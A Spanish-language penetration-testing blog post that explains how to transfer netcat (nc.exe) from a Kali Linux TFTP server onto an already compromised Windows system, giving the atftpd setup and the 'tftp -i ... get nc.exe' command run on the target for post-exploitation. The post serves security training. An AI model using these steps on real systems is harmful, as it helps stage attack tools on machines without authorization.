Subir Archivos hacia un Sistema Comprometido utilizando TFTP

  • Posted on: 4 August 2016
  • By: ReYDeS

TFTP (Trivial File Transfer Protocol) o por su traducción al idioma español, protocolo trivial para transferencia de archivos, es un protocolo basado en UDP, el cual frecuentemente está restringido en las reglas de filtros en los firewalls. En los sistemas operativos Windows 7, Windows Server 2008 en adelante, la herramienta necesita ser explícitamente añadida durante la instalación. Por estas razones, TFTP no es el protocolo ideal para la transferencia en la mayoría de situaciones.

Una gran ventaja del protocolo TFTP para las transferencias de archivos, es porque el cliente tftp puede funcionar interactivamente, haciendo fácil la transferencia si existen las condiciones correctas.

En Kali Linux se procede a ajustar el servidor TFTP, creando primero un directorio temporal en el cual residirán los archivos a copiar.

# mkdir /tmp/tftp

atftpd es un servidor TFTP. Por defecto es iniciado por inetd en muchos sistemas, pero puede ser ejecutado como un demonio autónomo. La opción “--daemon” define la ejecución como un demonio. No se debe utilizar esta opción si atftpd es iniciado por inted. La opción “--port” especifica el puerto en el cual atenderá atftpd. Útil cuando se define la opción “--daemon”. Por defecto es el puerto estándar.

# atftpd --daemon --port 69 /tmp/tftp/

El propósito es copiar hacia el objetivo de evaluación ya comprometido, la herramienta netcat. Se procede entonces a copiar hacia el directorio utilizado por atftpd, el archivo de nombre “nc.exe”.

# cp /usr/share/windows-binaries/nc.exe /tmp/tftp/

En el sistema comprometido se ejecuta el comando “tftp”.

C:\> tftp

Para descargar; hacia el sistema comprometido; el archivo “nc.exe” se define la opción “-i”, la cual especifica un modo de transferencia binaria. En este tipo de transferencia el archivo es movido literalmente byte por byte. Se define “GET” para transferir el archivo destino desde el Kali linux hacia el sistema comprometido local.


C:\> tftp -i 192.168.0.X get nc.exe

Si todo ha sido realizado correctamente, el archivo “nc.exe” (netcat) está disponible en el sistema comprometido, listo para apoyar en diversas acciones posteriores a la explotación.

Fuentes:

http://linux.die.net/man/8/atftpd
https://social.technet.microsoft.com/Forums/office/en-US/ca02359c-0572-4...

Sobre el Autor


Alonso Eduardo Caballero Quezada - ReYDeS
Instructor y Consultor Independiente en Ciberseguridad
Correo Electrónico: ReYDeS@gmail.com
Twitter: https://twitter.com/Alonso_ReYDeS
LinkedIn: https://pe.linkedin.com/in/alonsocaballeroquezada/
Facebook: https://www.facebook.com/alonsoreydes
Youtube: https://www.youtube.com/c/AlonsoCaballero


Curso de Informática Forense